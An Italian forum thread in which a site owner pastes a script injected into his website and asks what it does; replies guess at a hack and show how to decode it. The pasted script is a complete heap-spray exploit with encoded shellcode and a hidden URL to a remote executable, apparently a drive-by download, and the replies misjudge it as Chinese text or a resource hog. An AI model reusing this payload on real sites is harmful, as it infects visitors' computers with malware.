Cosa nasconde questo script?

[puffetto]

Ciao tutti
da qualche giorno aprendo ils ito noto che quando carica la pagina in basso nella barra richiama un link a me sconosciuto sono riuscito ad accuisire l'html della pagina richiamata e contiene solo questo script che a me appare abbastanza incomprensibile.


<SCRIPT language="javascript">
sShellcode=unescape("%u9090%u9090%u3390%u33c0%uebc 9%u5e12%ub966%u00ef%ufe8b%u2e80%u8007%u0436%ue246% uebf7%ue805%uffe9%uffff%ub5f4%u0b0b%u620b%uac67%u0 b3b%u0b0b%u4b96%u960f%u1f7b%u96b0%u1373%ufa96%u077 5%uf364%u0b55%u0b0b%u04ed%u7273%u0b71%u730b%u7d78% u706f%u0257%u9619%uf3f3%u0b37%u0b0b%uef8e%u962b%u7 5df%u5e2b%u5902%uca07%u2307%u6e5f%u787b%u47ca%u072 3%u6831%u6883%u47c9%u1323%u3e0b%u5bcb%u5e5b%u5b5a% u5902%u961b%u75df%u5e08%u5902%u0213%u0f59%u595c%u7 896%u963f%u3877%u0e83%u59f8%u7996%u0e2b%u3ef8%u54d 4%ub04c%uc80e%ue63e%uc112%u431b%u77fd%ucc13%u10d6% ue50e%uf64b%u46fc%u7822%u61ea%u6196%u0e27%u69e0%u0 f96%u9656%u1f61%ue00e%u0796%u0e96%ub6c8%u6461%uf3c e%u025c%u0202%u5191%uef11%ue6f0%u03ef%u01a3%u1195% ue381%u7eed%u2539%u7b32%u7773%u7b77%u3245%u7a32%u7 174%u726e%u7178%u6877%u7b7d%u727d%u6e31%u7072%u713 2%u7772%u3268%u7b72%u7168%u6831%u6883%u000b");
home = unescape("%u7468%u7074%u2f3a%u6f2f%u6f74%u2e72%u6e 69%u6f66%u782f%u742f%u7365%u2e74%u7865%u0065");
runnable = sShellcode+home;
skipper = unescape("%u0D0D%u0D0D");
while (skipper.length<20+runnable.length)
{ skipper+=skipper; }
skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);
while(skipper2.length<(0x40000-20-runnable.length))
{
skipper2 += skipper2;
skipper2 += skipper1;
}
context = new Array();
ii=-1;
while(++ii<414)
{ context[ii] = skipper2 + runnable; }
</SCRIPT>
<EMBED autostart="true" src="open.png" type="video/x-ms-wmv" width="10" height="10" controls="ImageWindow" console="cons">
</EMBED>

Potete aiutarmi a capire di cosa si tratta?
Grazie

[Andrea1979]

Se non è roba tua, allora hai qualche injection (sei stato hackerato). Se il tuo sito fa uso di codice server-side (asp, php o quant'altro), la "colpa" potrebbe essere di qualche tuo script poco sicuro, altrimenti potrebbe darsi che sia mal configurato il server su cui sei in hosting. Fai i controlli del caso e contatta il servizio hosting.

[puffetto]

di sicuro non è roba mia, ma sai dirmi quali operazione compie in pratica questo script?

[Andrea1979]

non ne ho idea: se provi a vedere che esce da quelli unescape è, a occhio, cinese e non sono molto ferrato in cinese... poi fa quelle operazioni di concatenazione... insomma, di sicuro tiene occupato risorse inutilmente. L'embed è di una png, quindi un'immagine, apparentemente... però l'header che prova a settare è di un file wmv... ti escono filmati strani?

[puffetto]

c'è qualche sistema per leggere i due unescape?

[Xinod]

inseriscilo in un blocco <script> in una pagina vuota

codice:

document.write(unescape("%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u00ef%ufe8b%u2e80%u8007%u0436%ue246%uebf7%ue805%uffe9%uffff%ub5f4%u0b0b%u620b%uac67%u0b3b%u0b0b%u4b96%u960f%u1f7b%u96b0%u1373%ufa96%u0775%uf364%u0b55%u0b0b%u04ed%u7273%u0b71%u730b%u7d78%u706f%u0257%u9619%uf3f3%u0b37%u0b0b%uef8e%u962b%u75df%u5e2b%u5902%uca07%u2307%u6e5f%u787b%u47ca%u0723%u6831%u6883%u47c9%u1323%u3e0b%u5bcb%u5e5b%u5b5a%u5902%u961b%u75df%u5e08%u5902%u0213%u0f59%u595c%u7896%u963f%u3877%u0e83%u59f8%u7996%u0e2b%u3ef8%u54d4%ub04c%uc80e%ue63e%uc112%u431b%u77fd%ucc13%u10d6%ue50e%uf64b%u46fc%u7822%u61ea%u6196%u0e27%u69e0%u0f96%u9656%u1f61%ue00e%u0796%u0e96%ub6c8%u6461%uf3ce%u025c%u0202%u5191%uef11%ue6f0%u03ef%u01a3%u1195%ue381%u7eed%u2539%u7b32%u7773%u7b77%u3245%u7a32%u7174%u726e%u7178%u6877%u7b7d%u727d%u6e31%u7072%u7132%u7772%u3268%u7b72%u7168%u6831%u6883%u000b"));
document.write(unescape("%u7468%u7074%u2f3a%u6f2f%u6f74%u2e72%u6e69%u6f66%u782f%u742f%u7365%u2e74%u7865%u0065"));

[puffetto]

ma non mi appare nulla.....

[Xinod]

questo e' quanto appare, per quanto possa essere d' aiuto...